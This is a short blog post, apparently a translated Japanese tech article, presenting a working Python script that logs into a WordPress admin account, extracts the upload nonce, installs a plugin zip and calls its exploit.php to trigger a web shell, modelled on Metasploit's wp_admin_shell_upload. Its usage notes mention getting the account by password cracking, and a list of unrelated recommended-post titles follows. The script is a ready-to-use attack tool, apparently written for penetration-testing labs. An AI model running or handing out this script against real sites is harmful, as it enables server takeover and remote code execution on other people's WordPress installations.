I wrote a script to upload a WordPress plugin

  1. Purpose

When I captured WordPress, I wanted a handy script to upload WebShell, but I couldn't find it on the Web, so I wrote it by referring to the communication of Metasploit's wp_admin_shell_upload module.

  1. Code

wp_plugin_upload.py


#!/usr/bin/python
# coding: utf-8

import requests
import sys
import bs4

url = 'http://10.11.XX.XX'
loginUri = '/wp/wp-login.php'
adminUri = '/wp/wp-admin/'
pluginUri = '/wp/wp-admin/plugin-install.php?tab=upload'
uploadUri = '/wp/wp-admin/update.php?action=upload-plugin'
uploadFile = {'pluginzip': ('exploit_plugin.zip', open('exploit_plugin.zip', 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
exploitUri = '/wp/wp-content/plugins/exploit_plugin/exploit.php'

# Headers
headers = {'wordpress_test_cookie':'WP+Cookie+check', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'}

try:
    # Session
    s = requests.Session()

    # Login
    loginData =  {'log':'admin', 'pwd':'XXXX', 'redirect_to':url + adminUri, 'wp-submit':'Login', 'rememberme':'forever', 'testcookie':'1'}
    r = s.post(url + loginUri, data=loginData)
    r.raise_for_status()

    # Plugin Install Page
    r = s.get(url + pluginUri, headers=headers)
    r.raise_for_status()

    # Get Hidden Param _wpnonce 
    # <input id="_wpnonce" name="_wpnonce" type="hidden" value="fdccb03ee7"/>
    # <input name="_wp_http_referer" type="hidden" value="/wp/wp-admin/plugin-install.php?tab=upload"/>
    # <input id="pluginzip" name="pluginzip" type="file"/>
    # <input class="button" id="install-plugin-submit" name="install-plugin-submit" type="submit" value="Install Now"/>
    bs4obj = bs4.BeautifulSoup(r.content, 'html5lib')
    wpnonce = bs4obj.find('input',id='_wpnonce')
    # print wpnonce['value']

    # Zip Upload
    multiPartData = {'_wpnonce':wpnonce['value'], 
                 'wp_http_referer':'/wp/wp-admin/plugin-install.php?tab=upload',
                 'install-plugin-submit':'Install Now'}

    r = s.post(url + uploadUri, files=uploadFile, data=multiPartData, headers=headers)
    r.raise_for_status()

    # Exploit Run
    r = s.get(url + exploitUri)
    r.raise_for_status()

except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

print(r.status_code)
# print(r.text)
  1. How to use

If you put the compressed ZIP file (exploit_plugin.zip) in the same folder as the script, it will be uploaded to the plugins folder of WordPressp. In addition, it is necessary to acquire a WordPress account by path crack etc. for execution, and rewrite the IP address etc. according to the environment.

$ python wp_plugin_upload.py

Recommended Posts

I wrote a script to upload a WordPress plugin
I wrote a script to get a popular site in Japan
I wrote a script to combine the divided ts files
I made a script to display emoji
I wrote a script to get you started with AtCoder fast!
I just wrote a script to build Android on another machine
I wrote a function to load a Git extension script in Python
I wrote a script to extract a web page link in Python
I wrote a script to help goodnotes5 and Anki work together
Upload a large number of images to Wordpress
AtCoder writer I wrote a script to aggregate the contests for each writer
[To Twitter gentlemen] I wrote a script to convert .jpg-large to .jpg at once.
I want to create a plug-in type implementation
I want to upload a Django app to heroku
I wrote a script to revive the gulp watch that will die soon
I made a script to put a snippet in README.md
Upload a file to Dropbox
I wrote a program quickly to study DI with Python ①
I wrote a script that splits the image in two
I made a script to say hello at my Koshien
I wrote a script to create a Twitter Bot development environment quickly with AWS Lambda + Python 2.7
I made a CUI-based translation script (2)
I made a CUI-based translation script
[Blender] How to make a Blender plugin
A script that uses boto to upload a specified folder to Amason S3
I tried to create a linebot (implementation)
I made a plugin to generate Markdown table from csv in Vim
I wrote a code to convert quaternions to z-y-x Euler angles in Python
I want to print in a comprehension
I tried to create a linebot (preparation)
Execute a script from Jupyter to process
I want to build a Python environment
I tried to create a plug-in with HULFT IoT Edge Streaming [Development] (2/3)
[Ubuntu] How to execute a shell script
A simple IDAPython script to name a function
I tried to create a plug-in with HULFT IoT Edge Streaming [Execution] (3/3)
I made a script in python to convert .md files to Scrapbox format
I tried to make a Web API
Script to create a Mac dictionary file
I tried to create a plug-in with HULFT IoT Edge Streaming [Setup] (1/3)
Creating a shell script to write a diary
I wrote gxredis to use redis-py safely
How to run a Maya Python script
I made a script to record the active window using win32gui of Python
I want to make matplotlib a dark theme
I tried to build a super-resolution method / ESPCN
I want to easily create a Noise Model
A memo that I wrote a quicksort in Python
I want to INSERT a DataFrame into MSSQL
I tried to build a super-resolution method / SRCNN ①
I added a function to CPython (ternary operator)
I want to create a window in Python
I want to make a game with Python
I wrote a class in Python3 and Java
I don't want to take a coding test
How to make a QGIS plugin (package generation)
I wrote a design pattern in kotlin Prototype
I made a tool to compile Hy natively
I read "How to make a hacking lab"
I tried to generate a random character string
I tried to build a super-resolution method / SRCNN ③